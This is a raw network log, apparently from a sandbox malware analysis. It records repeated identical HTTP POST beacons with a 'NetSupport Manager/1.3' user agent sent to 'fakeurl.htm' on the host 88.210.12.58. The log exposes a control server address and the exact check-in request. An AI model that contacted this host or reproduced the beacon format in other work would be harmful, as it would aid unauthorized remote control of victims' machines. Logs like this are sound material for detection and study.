Dec 10, 2024 08:59:53.108793020 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:53.208777905 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:53.308769941 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:53.408768892 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:53.506105900 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:53.608414888 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:53.709336996 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:53.821523905 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:53.928781986 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:54.345132113 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:54.445115089 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:54.545145988 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:54.645070076 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:54.746048927 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:54.846039057 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:54.947035074 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:55.048038960 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:55.148780107 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:55.248775005 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:55.349025011 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:55.449107885 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:55.550024986 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:55.652045965 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:55.752782106 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:55.852777004 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:55.956787109 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:56.054080009 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:56.155071974 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:56.255155087 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:56.358746052 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:56.460112095 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:56.561065912 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:56.661053896 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:56.762156010 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:56.862099886 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:56.962091923 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:57.064800978 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:57.164062023 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:57.264094114 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:57.365155935 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:57.465214968 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:57.568789005 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:57.666053057 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:57.768785000 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:57.867069960 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:57.968825102 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:58.068120956 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:58.168118954 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:58.269088984 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:58.369076014 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:58.470078945 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:58.570039034 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:58.670087099 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:58.770154953 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:58.871105909 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:58.971093893 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:59.072798967 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:59.172787905 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:59.276808023 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:59.373060942 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:59.473042011 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:59.573103905 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:59.674055099 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:59.776779890 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:59.876796961 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:59.975078106 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:00.077356100 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:00.177114964 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:00.278050900 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:00.378087997 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:00.479064941 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:00.580111980 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:00.681082964 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:00.781084061 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:00.882078886 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:00.984879971 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:01.084783077 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:01.184782028 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:01.285072088 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:01.386070013 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:01.487046003 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:01.587049961 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:01.688051939 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:01.789217949 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:01.889040947 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:01.990122080 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:02.091170073 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:02.192094088 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:02.292082071 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:02.393167019 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:02.494054079 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:03.235075951 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:03.336064100 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
